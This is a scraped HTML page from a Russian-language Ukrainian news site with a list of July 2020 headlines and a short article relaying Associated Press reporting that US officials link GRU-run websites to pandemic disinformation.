href="https://enovosty.com/zdorove/full/2907-kak-vosstanovit-immunitet-posle-covid-19-sovety-vrachej">Как восстановить иммунитет после COVID-19 - советы врачей</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813368"> <span class="postDate">15:21</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-armyano-azerbajdzhanskij-konflikt-priobretaet-mezhdunarodnyj-xarakter-turciya-napravila-svoi-vojska-v-azerbajdzhan-video">Армяно-азербайджанский конфликт приобретает международный характер: Турция направила свои войска в Азербайджан (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813366"> <span class="postDate">15:02</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2907-kabmin-prognoziruet-rost-vvp-na-46-v-2021-godu">Кабмин прогнозирует рост ВВП на 4,6% в 2021 году</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813271"> <span class="postDate">15:00</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2907-britanskaya-armiya-poluchila-pervye-bronirovannye-mashiny-ares-video">Британская армия получила первые бронированные машины ARES (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813363"> <span class="postDate">13:54</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/2907-sud-s-efremovym-perenesli-sut-situacii">Суд с Ефремовым перенесли. Суть ситуации</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813347"> <span class="postDate">13:40</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/2907-v-kieve-lyubiteli-ekstrima-prygali-v-dnepr-pryamo-s-kryshi-vagona-metro-video">В Киеве любители экстрима прыгали в Днепр прямо с крыши вагона метро (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813337"> <span class="postDate">13:20</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2907-v-kitae-nachalis-xodovye-ispytaniya-odnogo-iz-krupnejshix-boevyx-korablej-udk-proekta-075">В Китае начались ходовые испытания одного из крупнейших боевых кораблей - УДК проекта 075</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813318"> <span class="postDate">13:00</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/2907-dizelgejt-volkswagen-vyplatil-amerikanskim-voditelyam-pochti-10-mlrd-dollarov">Дизельгейт: Volkswagen выплатил американским водителям почти 10 млрд долларов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813267"> <span class="postDate">12:40</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-britanskaya-armiya-moderniziruet-svoi-bronirovannye-mashiny-foxhound">Британская армия модернизирует свои бронированные машины Foxhound</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813352"> <span class="postDate">12:37</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2907-stalo-izvestno-pochemu-vysokie-muzhchiny-chashhe-zarazhayutsya-koronavirusom">Стало известно, почему высокие мужчины чаще заражаются коронавирусом</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813343"> <span class="postDate">12:18</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/2907-poleznaya-informaciya-o-kvalificirovannoj-yuridicheskoj-pomoshhi-fizicheskim-licam">Полезная информация о квалифицированной юридической помощи физическим лицам</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813346"> <span class="postDate">12:06</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2907-stalo-izvestno-kto-mozhet-zamenit-kuchmu">Стало известно, кто может заменить Кучму</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813344"> <span class="postDate">11:55</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2907-erdogan-pokazal-miru-chto-putin-uzhe-ne-tot-opasnyj-i-vsesilnyj-prezident">Эрдоган показал миру, что Путин уже не тот опасный и всесильный президент</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813342"> <span class="postDate">11:30</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2907-v-minzdrave-sdelali-vazhnoe-zayavlenie-o-rabote-shkol">В Минздраве сделали важное заявление о работе школ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813339"> <span class="postDate">11:11</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2907-tishina-na-donbasse-v-obse-nazvali-kolichestvo-narushenij-v-pervyj-den">"Тишина" на Донбассе: В ОБСЕ назвали количество нарушений в первый день</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813320"> <span class="postDate">10:43</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/2907-raskryta-svyaz-sobstvennicy-konkord-banka-eleny-sosedki-mishalovoj-s-igornym-biznesom-i-rossiej-rassledovanie-smi">Раскрыта связь собственницы «Конкорд Банка» Елены Соседки-Мишаловой с игорным бизнесом и Россией - расследование СМИ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813316"> <span class="postDate">10:07</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-v-afrike-unichtozheny-rossijskie-zrpk-pancir-s1">В Африке уничтожены российские ЗРПК «Панцирь-С1»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813315"> <span class="postDate">09:42</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-zhil-v-kitae-uchenye-udivili-informaciej-o-predke-koronavirusa">"Жил" в Китае: Ученые удивили информацией о "предке" коронавируса</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813313"> <span class="postDate">09:33</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-v-evrope-zayavili-o-novoj-volne-koronavirusa">В Европе заявили о новой волне коронавируса</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813307"> <span class="postDate">08:40</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2907-v-snbo-poobeshhali-neozhidannyj-otvet-na-ucheniya-rf-u-ukrainskix-granic">В СНБО пообещали "неожиданный" ответ на учения РФ у украинских границ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813306"> <span class="postDate">08:27</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2907-ssha-i-rf-nachali-yadernye-peregovory">США и РФ начали ядерные переговоры</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813305"> <span class="postDate">08:24</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2907-vojna-na-donbasse-soxranyaetsya-tishina">Война на Донбассе: сохраняется "тишина"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813295"> <span class="postDate">07:30</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2907-vo-francii-startovala-sborka-krupnejshego-v-mire-termoyadernogo-reaktora-iter">Во Франции стартовала сборка крупнейшего в мире термоядерного реактора ITER</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813293"> <span class="postDate">07:15</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2907-v-ssha-sozdali-detektor-mgnovennogo-obnaruzheniya-covid-19">В США создали детектор мгновенного обнаружения COVID-19</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>28.07.2020 г.</span><br /><div class="post_news"> <span id="post-4813302"> <span class="postDate">23:20</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2807-na-poberezhe-azovskogo-morya-posle-shtorma-poyavilos-mnozhestvo-meduz-video">На побережье Азовского моря после шторма появилось множество медуз (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813280"> <span class="postDate">23:00</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2807-na-poxorony-syna-krymskogo-tatarina-prishli-tysyachi-lyudej-fsb-ne-pozvolila-otcu-prostitsya-s-rebenkom">На похороны сына крымского татарина пришли тысячи людей, ФСБ не позволила отцу проститься с ребенком</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813290"> <span class="postDate">20:58</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2807-korabl-ilona-maska-srew-dragon-vozvrashhaetsya-na-zemlyu-podrobnosti">Корабль Илона Маска Сrew Dragon возвращается на Землю: подробности</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813277"> <span class="postDate">20:48</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2807-rossijskie-mig-31-postavyat-na-beskonechnuyu-reanimaciyu-zloj-odessit">Российские Миг-31 поставят на бесконечную "реанимацию", - Злой Одессит</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813275"> <span class="postDate">20:13</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2807-stalo-izvestno-v-kakix-oblastyax-nelzya-oslablyat-karantin">Стало известно, в каких областях нельзя ослаблять карантин</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813272"> <span class="postDate">19:59</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2807-donalda-trampa-mladshego-zablokirovali-v-twitter-za-dezinformaciyu-o-covid-19">Дональда Трампа-младшего заблокировали в Twitter за дезинформацию о COVID-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813270"> <span class="postDate">19:49</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2807-rossijskie-istrebiteli-su-27-narushili-vozdushnoe-prostranstvo-finlyandii">Российские истребители Су-27 нарушили воздушное пространство Финляндии</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813264"> <span class="postDate">19:19</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2807-kiberpoliciya-razoblachila-kiberprestupnika-v-prodazhe-uchetnyx-zapisej-polzovatelej-internet">Киберполиция разоблачила киберпреступника в продаже учетных записей пользователей интернет</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813260"> <span class="postDate">18:59</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2807-set-shokirovalo-video-s-podvodnym-monstrom">Сеть шокировало видео с "подводным монстром"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813258"> <span class="postDate">18:49</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2807-evrosoyuz-prodlevaet-zakrytie-vneshnix-granic-podrobnosti">Евросоюз продлевает закрытие внешних границ: подробности</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813256"> <span class="postDate">18:19</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2807-turciya-razvernula-na-livijskoj-aviabaze-al-vatiya-reb-koral-zloj-odessit">Турция развернула на ливийской авиабазе аль-Ватия РЭБ «KORAL», - Злой Одессит</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813248"> <span class="postDate">17:59</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/2807-na-alyaske-vse-chashhe-stali-naxodit-doistoricheskix-zhivotnyx-reuters">На Аляске все чаще стали находить доисторических животных, - Reuters</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813245"> <span class="postDate">17:49</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2807-ukraina-polsha-i-litva-sozdali-lyublinskij-treugolnik">Украина, Польша и Литва создали «Люблинский треугольник»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813233"> <span class="postDate">17:29</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2807-v-avstralii-na-bereg-vyneslo-trup-gigantskogo-sushhestva">В Австралии на берег вынесло труп гигантского существа (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4813227"> <span class="postDate">16:59</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2807-v-ukraine-obyavleno-shtormovoe-preduprezhdenie">В Украине объявлено штормовое предупреждение</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/">Все новости &raquo;</a></div><div class="links_bal"></div>  </div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category"><style type="text/css" media="screen">@import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);</style><style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px}</style><div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" > <div itemscope itemtype="https://schema.org/NewsArticle" class="post _ga1_on_" style="margin:0; padding:0; " id="post-4813427"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/news_abroad/full/2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press"/><article style="font-size:12pt;"><h1 itemprop="headline" id="postTitle">Российские спецслужбы используют англоязычные веб-сайты для распространения дезинформации, &#8212; Associated Press</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/news_abroad">Новости мира</a> <span>&raquo;</span> Российские спецслужбы используют англоязычные веб-сайты для распространения дезинформации, - Associated Press</div><time datetime="2020-07-29T20:40:02+03:00"><span id="date">Новости мира, 20:40:02 </span></time><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span><span class="swp_count">1</span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%A0%D0%BE%D1%81%D1%81%D0%B8%D0%B9%D1%81%D0%BA%D0%B8%D0%B5+%D1%81%D0%BF%D0%B5%D1%86%D1%81%D0%BB%D1%83%D0%B6%D0%B1%D1%8B+%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D1%83%D1%8E%D1%82+%D0%B0%D0%BD%D0%B3%D0%BB%D0%BE%D1%8F%D0%B7%D1%8B%D1%87%D0%BD%D1%8B%D0%B5+%D0%B2%D0%B5%D0%B1-%D1%81%D0%B0%D0%B9%D1%82%D1%8B+%D0%B4%D0%BB%D1%8F+%D1%80%D0%B0%D1%81%D0%BF%D1%80%D0%BE%D1%81%D1%82%D1%80%D0%B0%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F+%D0%B4%D0%B5%D0%B7%D0%B8%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%86%D0%B8%D0%B8%2C+-++Associated+Press&url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%A0%D0%BE%D1%81%D1%81%D0%B8%D0%B9%D1%81%D0%BA%D0%B8%D0%B5+%D1%81%D0%BF%D0%B5%D1%86%D1%81%D0%BB%D1%83%D0%B6%D0%B1%D1%8B+%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D1%83%D1%8E%D1%82+%D0%B0%D0%BD%D0%B3%D0%BB%D0%BE%D1%8F%D0%B7%D1%8B%D1%87%D0%BD%D1%8B%D0%B5+%D0%B2%D0%B5%D0%B1-%D1%81%D0%B0%D0%B9%D1%82%D1%8B+%D0%B4%D0%BB%D1%8F+%D1%80%D0%B0%D1%81%D0%BF%D1%80%D0%BE%D1%81%D1%82%D1%80%D0%B0%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F+%D0%B4%D0%B5%D0%B7%D0%B8%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%86%D0%B8%D0%B8%2C+-++Associated+Press&url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4813427" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><p><b>По словам представителей правительства США, российские спецслужбы используют англоязычные веб-сайты для распространения дезинформации</b></p> <div style="text-align:center;"> <div data-hyb-ssp-in-image-overlay="5ef49f174d506eacc0504d73"><img width="460" height="253" src="https://enovosty.com/wp-content/uploads/2020/07/303458-460x253.jpg" class="attachment-news-image size-news-image wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2020/07/303458.jpg 460w, https://enovosty.com/wp-content/uploads/2020/07/303458-112x62.jpg 112w, https://enovosty.com/wp-content/uploads/2020/07/303458-300x165.jpg 300w" sizes="(max-width: 460px) 100vw, 460px" /></div></div> <p>Российские спецслужбы используют англоязычные веб-сайты для распространения дезинформации о пандемии коронавируса. Об этом сообщает Associated Press, информирует <a class="inform" href="https://enovosty.com/news">enovosty.com/news</a>.</p><p>По словам представителей правительства США, два россиянина, которые занимали руководящие должности в военной разведке Москвы, известной как ГРУ, были признаны ответственными за дезинформацию. </p><p>Хотя официальные лица США ранее предупреждали о распространении дезинформации, связанной с пандемией, сейчас же были представлены конкретные <a class="tag" href="https://enovosty.com/tag/veb-resursy" target="_blank">веб-ресурсы</a><a class="tag" href="https://enovosty.com/tag/resurs" target="_blank">, расп</a>ространяющие дезинформацию. В обнародованной информации говорится, что информационное агентство InfoRos, зарегистрированное в России, управляет рядом веб-сайтов &#8212; InfoRos.ru, Infobrics. org и OneWorld.press, которые изменяли новости о пандемии для продвижения антизападных призывов и распространения дезинформации.</p><p>Пока неизвестно, связаны ли кампании по дезинфомации с предстоящими ноябрьскими президентскими выборами. Но уже известно, что в публикуемой информации идет кампания против <a class="tag" href="https://enovosty.com/tag/demokrat" target="_blank">демократ</a>а Джо Байдена, публикуются нарративы об обострении расовых и других проблем в США.</p><p class="readlink one_test"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/news_society/full/1307-sbu-blokirovala-rabotu-mezhdunarodnoj-prestupnoj-gruppy" >СБУ блокировала работу международной преступной группы</a></p><div class="tptn_counter" style="color:white;" id="tptn_counter_4813427"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4813427&amp;_wpnonce=c9efa08914"></script></div><div class="swp-content-locator"></div><br /><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"/> <meta itemprop="width" content="512"> <meta itemprop="height" content="512"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Оксана Ельченко" /></span><meta itemprop="datePublished" content="2020-07-29T20:40:02+03:00"/><meta itemprop="dateModified" content="2020-07-29T20:43:01+03:00"/><meta itemprop="genre" content="Новости мира"/><meta itemprop="description" content="По словам представителей правительства США, российские спецслужбы используют англоязычные веб-сайты для распространения дезинформации"/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/uploads/2020/07/303458-460x253.jpg"><span itemprop="image" content="https://enovosty.com/wp-content/uploads/2020/07/303458-460x253.jpg"><meta itemprop="width" content="460"><meta itemprop="height" content="253"> </span></span></div></article></div> <div class="postFooter" style="padding:0;"><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/youtube.jpg"></a><span id="authorName" style="margin-right: 25px;float: left;"><span id="label">Автор: Оксана Ельченко</span></span><div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">ТЕГИ: <a href="https://enovosty.com/tag/veb-resursy" rel="tag">веб-ресурсы</a>, <a href="https://enovosty.com/tag/dezinformaciya" rel="tag">дезинформация</a>, <a href="https://enovosty.com/tag/demokrat" rel="tag">демократ</a>, <a href="https://enovosty.com/tag/resurs" rel="tag">ресурс</a></div><div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 117</div><div class="voteBox" > </div><br /><p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span><span class="swp_count">1</span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%A0%D0%BE%D1%81%D1%81%D0%B8%D0%B9%D1%81%D0%BA%D0%B8%D0%B5+%D1%81%D0%BF%D0%B5%D1%86%D1%81%D0%BB%D1%83%D0%B6%D0%B1%D1%8B+%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D1%83%D1%8E%D1%82+%D0%B0%D0%BD%D0%B3%D0%BB%D0%BE%D1%8F%D0%B7%D1%8B%D1%87%D0%BD%D1%8B%D0%B5+%D0%B2%D0%B5%D0%B1-%D1%81%D0%B0%D0%B9%D1%82%D1%8B+%D0%B4%D0%BB%D1%8F+%D1%80%D0%B0%D1%81%D0%BF%D1%80%D0%BE%D1%81%D1%82%D1%80%D0%B0%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F+%D0%B4%D0%B5%D0%B7%D0%B8%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%86%D0%B8%D0%B8%2C+-++Associated+Press&url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%A0%D0%BE%D1%81%D1%81%D0%B8%D0%B9%D1%81%D0%BA%D0%B8%D0%B5+%D1%81%D0%BF%D0%B5%D1%86%D1%81%D0%BB%D1%83%D0%B6%D0%B1%D1%8B+%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D1%83%D1%8E%D1%82+%D0%B0%D0%BD%D0%B3%D0%BB%D0%BE%D1%8F%D0%B7%D1%8B%D1%87%D0%BD%D1%8B%D0%B5+%D0%B2%D0%B5%D0%B1-%D1%81%D0%B0%D0%B9%D1%82%D1%8B+%D0%B4%D0%BB%D1%8F+%D1%80%D0%B0%D1%81%D0%BF%D1%80%D0%BE%D1%81%D1%82%D1%80%D0%B0%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F+%D0%B4%D0%B5%D0%B7%D0%B8%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%86%D0%B8%D0%B8%2C+-++Associated+Press&url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2907-rossijskie-specsluzhby-ispolzuyut-angloyazychnye-veb-sajty-dlya-rasprostraneniya-dezinformacii-associated-press"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4813427" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><link rel="stylesheet" type="text/css" media="screen" href="https://enovosty.com/wp-content/plugins/ajax-login/login.css?v=2" /><div id="popup-login"><div class="login"><div class="caption"><span class="title">Вход на сайт</span><a class="link-close" href="#"><span class="close">Закрыть</span></a></div><form name="loginform" id="loginform" action="#" method="post"><p class="error"></p><p class="message"></p><img id="al_loadingImage" alt="Загрузка..." src="https://enovosty.com/wp-content/plugins/ajax-login/al_loading.gif"/><p><label for="user_login">Логин (email):</label><input type="text" name="user_login" id="user_login" class="input" value="" size="20" /></p><p><label for="user_pass">Пароль:</label><input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></p><div class="login-footer"><p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /><label for="rememberme">Запомнить меня</label></p><p class="submit"><input type="button" onClick="sendLogin('https://enovosty.com/wp-content/plugins/ajax-login/login.php', jQuery('#loginform').serialize());return false;" name="wp-submit" id="wp-submit" value="Войти" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="/register" id="wp-register">Зарегистрироваться</a></p></div><fieldset><legend>или</legend><div class="soclogin"> </div></fieldset></form></div></div><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/ajax-login/ajaxlogin.js"></script><input style="width: auto;float: none;background: #2196F3;margin: 5px 0;padding: 0 10px;font-size: 12px;" type="button" value="Вход/Регистрация" id="addanons" name="wp-submit" onclick="get_auth()" ><style type="text/css" media="screen">@import 